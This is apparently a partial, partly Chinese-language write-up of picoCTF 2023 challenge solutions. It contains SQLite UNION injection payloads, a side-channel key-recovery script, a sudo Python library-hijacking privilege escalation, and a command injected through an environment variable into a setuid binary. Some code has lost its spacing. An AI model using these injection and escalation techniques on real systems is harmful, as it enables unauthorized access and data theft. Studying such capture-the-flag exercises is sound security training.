Payload:' UNION SELECT (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' LIMIT 3,1),2,3--
用LIMIT前後尋找後可以發現一個叫做more_table的表格,再攻擊一次看看裡面有哪些欄位:
Payload:' UNION SELECT (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='more_table'),2,3--
裡面有一個叫做flag的欄位,用SELECT去讀取它即可獲得flag。
Payload:' UNION SELECT (SELECT flag FROM more_table),2,3--
Java Code Analysis!?!
AUTHOR: NANDAN DESAI
Description BookShelf Pico, my premium online book-reading service. I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book! Here are the credentials to get you started: Username: “user” Password: “user” Source code can be downloaded here. Website can be accessed here!. 300 Points
private String generateRandomString(int len) { // not so random return"1234"; }
String getServerSecret() { try { Stringsecret=newString(FileOperation.readFile(userDataPaths.getCurrentJarPath(), SERVER_SECRET_FILENAME), Charset.defaultCharset()); logger.info("Server secret successfully read from the filesystem. Using the same for this runtime."); return secret; }catch (IOException e){ logger.info(SERVER_SECRET_FILENAME+" file doesn't exists or something went wrong in reading that file. Generating a new secret for the server."); StringnewSecret= generateRandomString(32); try { FileOperation.writeFile(userDataPaths.getCurrentJarPath(), SERVER_SECRET_FILENAME, newSecret.getBytes()); } catch (IOException ex) { ex.printStackTrace(); } logger.info("Newly generated secret is now written to the filesystem for persistence."); return newSecret; } } }
Description This encryption algorithm leaks a “bit” of data every time it does a computation. Use this to figure out the encryption key. Download the encryption program here encrypt.py. Access the running server with nc saturn.picoctf.net 53848. The flag will be of the format picoCTF{<encryption key>} where <encryption key> is 32 lowercase hex characters comprising the 16-byte encryption key being used by the program. 200 Points
# Leaks one bit of information every operation leak_buf = [] defleaky_aes_secret(data_byte, key_byte): out = Sbox[data_byte ^ key_byte] leak_buf.append(out & 0x01) return out
# Simplified version of AES with only a single encryption stage defencrypt(plaintext, key): global leak_buf leak_buf = [] ciphertext = [leaky_aes_secret(plaintext[i], key[i]) for i inrange(16)] return ciphertext
# Leak the number of 1 bits in the lowest bit of every SBox output defencrypt_and_leak(plaintext): ciphertext = encrypt(plaintext, SECRET_KEY) ciphertext = None# throw away result time.sleep(0.01) return leak_buf.count(1)
pt = input("Please provide 16 bytes of plaintext encoded as hex: ") iflen(pt) != 32: print("Invalid length") sys.exit(0)
for i inrange(0xff): m=[] for j inrange(15): m.append(sb[j^i]&0x01) out.append(m)
for i in out: print(i)
flage=[]
for i inrange(16): n=[] nn=[] for j inrange(15): payload='' payload+='0'*((15-i)*2+1) payload+=hex(j)[2:] payload+='0'*i*2 r=remote('saturn.picoctf.net',56284) r.recvuntil(': ') r.sendline(payload.encode()) g=int(r.recvline().strip()[16:]) n.append(g) r.close() for k in n: nn.append(k-min(n)) print(nn) for l inrange(0xff): if out[l] == nn: flage.append(l)
flage.reverse() print(flage) print(''.join([hex(i)[2:] for i in flage]))
Description Can you make a CoreWars warrior that always loses, no ties? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 64827 < imp.red 100 Points
$ ./ret Enter the password to unlock this file: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a You entered: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a Password correct, please see flag: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a4} picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a
Safe Opener 2
AUTHOR: MUBARAK MIKAIL
Description What can you do with this file? I forgot the key to my safe but this file is supposed to help me with retrieving the lost key. Can you help me unlock my safe? 100 Points
Description Can you crack this black box? We grabbed this design doc from enemy servers: Download. We know that the rotation of the red axle is input and the rotation of the blue axle is output. The following input gives the flag as output: Download. 100 Points
$ python3 Python 3.10.6 (main, Nov 14 2022, 16:10:14) [GCC 11.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from Crypto.Util.number import * >>> inp=39722847074734820757600524178581224432297292490103996085769154356559546905 >>> long_to_bytes(inp*5) b'picoCTF{g34r5_0f_m0r3_c133eae2}'
P.S.這題這麼少人解應該是因為不知道.dae到底是什麼XD
No way out
AUTHOR: KRIS
Description Put this flag in standard picoCTF format before submitting. If the flag was h1_1m_7h3_f14g submit picoCTF{h1_1m_7h3_f14g} to the platform. Windows game, Mac game 200 Points
Description Can you make a CoreWars warrior that wins? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 58681 < imp.red To get the flag, you must beat the Imp at least once out of the many rounds. 200 Points
$ nc saturn.picoctf.net 58681 < imp.red ;redcode ;name Imp Ex ;assert 1 ADD #4, 3 MOV 2, @2 JMP -2 DAT #0, #4 end Submit your warrior: (enter 'end' when done)
Warrior1: ;redcode ;name Imp Ex ;assert 1 ADD #4, 3 MOV 2, @2 JMP -2 DAT #0, #4 end
Rounds: 100 Warrior 1 wins: 26 Warrior 2 wins: 0 Ties: 74 You did it! picoCTF{1mp_1n_7h3_cr055h41r5_441be1fc}
Virtual Machine 1
AUTHOR: LT ‘SYREAL’ JONES
Description The enemy has upgraded their mechanical analog computer. Start an instance to begin. We grabbed this design doc from enemy servers: Download. We know that the rotation of the red axle is input and the rotation of the blue axle is output. Reverse engineer the mechanism and get past their checker program: nc saturn.picoctf.net 63883 300 Points
$ nc saturn.picoctf.net 63883 If the input to the machine is 4347, what is the output? Answer> 40683573 40683573 That's correct! picoCTF{m0r3_g34r5_3g4d_2efa1d52}
Ready Gladiator 2
AUTHOR: LT ‘SYREAL’ JONES
Description Can you make a CoreWars warrior that wins every single round? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 53774 < imp.red To get the flag, you must beat the Imp all 100 rounds. 400 Points
Description Every file gets a flag. The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here. 100 Points
DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced 41 0x29 Zlib compressed data, compressed 39739 0x9B3B Zip archive data, at least v1.0 to extract, name: secret/ 39804 0x9B7C Zip archive data, at least v2.0 to extract, compressed size: 2869, uncompressed size: 3024, name: secret/flag.png 42908 0xA79C End of Zip archive, footer length: 22
Description Someone just sent you an email claiming to be Google’s co-founder Larry Page but you suspect a scam. Can you help us identify whose mail server the email actually originated from? Download the email file here. Flag: picoCTF{FirstnameLastname} 100 Points
# # ARIN WHOIS data and services are subject to the Terms of Use ...
person: Wilhelm Zwalina ...
FindAndOpen
AUTHOR: MUBARAK MIKAIL
Description Someone might have hidden the password in the trace file. Find the key to unlock this file. This tracefile might be good to analyze. 100 Points
Description This image passes LSB statistical analysis, but we can’t help but think there must be something to the visual artifacts present in this image… Download the image here 200 Points
Description How to automate tasks to run at intervals on linux servers? Additional details will be available after launching your challenge instance. 100 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 30 05:11:26 2023 from 114.36.17.55 picoplayer@challenge:~$ cat /challenge/metadata.json {"flag": "picoCTF{Sch3DUL7NG_T45K3_L1NUX_7754e199}", "username": "picoplayer", "password": "a-8nJGZCTa"}
money-ware
AUTHOR: JUNI19
Description Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of? 100 Points
這題是簡單的OSINT,上網找一下那串奇怪的編碼就能找到那個malware的名字了。
Permissions
AUTHOR: GEOFFREY NJOGU
Description Can you read files in the root file? Additional details will be available after launching your challenge instance. 100 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 30 05:27:26 2023 from 114.36.17.55 picoplayer@challenge:~$ /bin/sh $ cat /challenge/metadata.json {"flag": "picoCTF{uS1ng_v1m_3dit0r_021d10ab}", "username": "picoplayer", "password": "dLAqMvm7xv"}
repetitions
AUTHOR: THEONESTE BYAGUTANGAZA
Description Can you make sense of this file? Download the file here. 100 Points
Description There’s an interesting script in the user’s home directory Additional details will be available after launching your challenge instance. 100 Points
useless useless, — This is a simple calculator script
SYNOPSIS useless, [add sub mul div] number1 number2
DESCRIPTION Use the useless, macro to make simple calulations like addition,subtraction, multiplication and division.
Examples ./useless add 1 2 This will add 1 and 2 and return 3
./useless mul 2 3 This will return 6 as a product of 2 and 3
./useless div 6 3 This will return 2 as a quotient of 6 and 3
./useless sub 6 5 This will return 1 as a remainder of substraction of 5 from 6
Authors This script was designed and developed by Cylab Africa
picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_5562}
Special
AUTHOR: LT ‘SYREAL’ JONES
Description Don’t power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized… automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That’s Special (TM) Start your instance to see connection details. Additional details will be available after launching your challenge instance. 300 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 30 07:54:44 2023 from 127.0.0.1 Special$ ls Is sh: 1: Is: not found Special$ pwd Pod sh: 1: Pod: not found
Special$ /bin/sh Why go back to an inferior shell? Special$ /bin/bash Why go back to an inferior shell? Special$ /bin/zsh Why go back to an inferior shell?
Description Reception of Special has been cool to say the least. That’s why we made an exclusive version of Special, called Secure Comprehensive Interface for Affecting Linux Empirically Rad, or just ‘Specialer’. With Specialer, we really tried to remove the distractions from using a shell. Yes, we took out spell checker because of everybody’s complaining. But we think you will be excited about our new, reduced feature set for keeping you focused on what needs it the most. Please start an instance to test your very own copy of Specialer. Additional details will be available after launching your challenge instance. 400 Points
$ ssh -p 55013 ctf-player@saturn.picoctf.net ctf-player@saturn.picoctf.net's password: Specialer$ ! bind compopt elif fc if printf shift true while ./ break continue else fg in pushd shopt type { : builtin coproc enable fi jobs pwd source typeset } [ caller declare esac for kill read suspend ulimit [[ case dirs eval function let readarray test umask ]] cd disown exec getopts local readonly then unalias alias command do exit hash logout return time unset bash compgen done export help mapfile select times until bg complete echo false history popd set trap wait
Description Get the flag and reach the exit. Welcome to BabyGame! Navigate around the map and see what you can find! The game is available to download here. There is no source available, so you’ll have to figure your way around the map. You can connect with it using nc saturn.picoctf.net 61841. 100 Points
Description Can you solve this? What two positive numbers can make this possible: n1 > n1 + n2 OR n2 > n1 + n2 Enter them here nc saturn.picoctf.net 61849. Source 100 Points
$ nc saturn.picoctf.net 61849 n1 > n1 + n2 OR n2 > n1 + n2 What two positive numbers can make this possible: 2147483647 1 You entered 2147483647 and 1 You have an integer overflow YOUR FLAG IS: picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_fe14e9e9}
hijacking
AUTHOR: THEONESTE BYAGUTANGAZA
Description Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we’ve got the credentials to use on the server. SSH is running on the server. 200 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 30 08:40:58 2023 from 114.36.17.55 picoctf@challenge:~$ ls -al total 16 drwxr-xr-x 1 picoctf picoctf 20 Mar 30 08:40 . drwxr-xr-x 1 root root 21 Mar 16 02:08 .. -rw-r--r-- 1 picoctf picoctf 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 picoctf picoctf 3771 Feb 25 2020 .bashrc drwx------ 2 picoctf picoctf 34 Mar 30 08:40 .cache -rw-r--r-- 1 picoctf picoctf 807 Feb 25 2020 .profile -rw-r--r-- 1 root root 375 Mar 16 01:30 .server.py picoctf@challenge:~$ cat .server.py import base64 import os import socket ip = 'picoctf.org' response = os.system("ping -c 1 " + ip) #saving ping details to a variable host_info = socket.gethostbyaddr(ip) #getting IP from a domaine host_info_to_str = str(host_info[2]) host_info = base64.b64encode(host_info_to_str.encode('ascii')) print("Hello, this is a part of information gathering",'Host: ', host_info)
$ sudo -l Matching Defaults entries for picoctf on challenge: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoctf may run the following commands on challenge: (ALL) /usr/bin/vi (root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py picoctf@challenge:~$ sudo -u root /usr/bin/python3 /home/picoctf/.server.py # ls __pycache__ base64.py # cat /challenge/metadata.json {"flag": "picoCTF{pYth0nn_libraryH!j@CK!n9_6924176e}", "username": "picoctf", "password": "rZSsB--vJK"}
tic-tac
AUTHOR: JUNIAS BONOU
Description Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it. Additional details will be available after launching your challenge instance. 200 Points
std::string filename = argv[1]; std::ifstream file(filename); struct stat statbuf;
// Check the file's status information. if (stat(filename.c_str(), &statbuf) == -1) { std::cerr << "Error: Could not retrieve file information" << std::endl; return 1; }
// Check the file's owner. if (statbuf.st_uid != getuid()) { std::cerr << "Error: you don't own this file" << std::endl; return 1; }
// Read the contents of the file. if (file.is_open()) { std::string line; while (getline(file, line)) { std::cout << line << std::endl; } } else { std::cerr << "Error: Could not open file" << std::endl; return 1; }
return 0; } ctf-player@pico-chall$ ./txtreader flag.txt Error: you don't own this file
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 30 09:56:09 2023 from 127.0.0.1 ctf-player@pico-chall$ ls -al total 28 drwxr-xr-x 1 ctf-player ctf-player 41 Mar 30 09:56 . drwxr-xr-x 1 root root 24 Mar 16 01:59 .. -rw------- 1 ctf-player ctf-player 21 Mar 30 09:56 .bash_history drwx------ 2 ctf-player ctf-player 34 Mar 30 09:56 .cache -rw-r--r-- 1 root root 67 Mar 16 01:59 .profile -rwsr-xr-x 1 root root 18752 Mar 16 01:59 bin ctf-player@pico-chall$ ./bin Error: SECRET_DIR environment variable is not set
執行的時候說SECRET_DIR沒有設定,看起來應該是要設定路徑的名稱,馬上來試試看。
1 2 3 4 5
ctf-player@pico-chall$ export SECRET_DIR=/ ctf-player@pico-chall$ ./bin Listing the content of / as root: bin challenge etc lib lib64 media opt root sbin sys usr boot dev home lib32 libx32 mnt proc run srv tmp var
ctf-player@pico-chall$ export SECRET_DIR="/;cat /challenge/metadata.json" ctf-player@pico-chall$ ./bin Listing the content of /;cat /challenge/metadata.json as root: bin challenge etc lib lib64 media opt root sbin sys usr boot dev home lib32 libx32 mnt proc run srv tmp var {"flag": "picoCTF{Power_t0_man!pul4t3_3nv_1670f174}", "password": "3f39b042"}
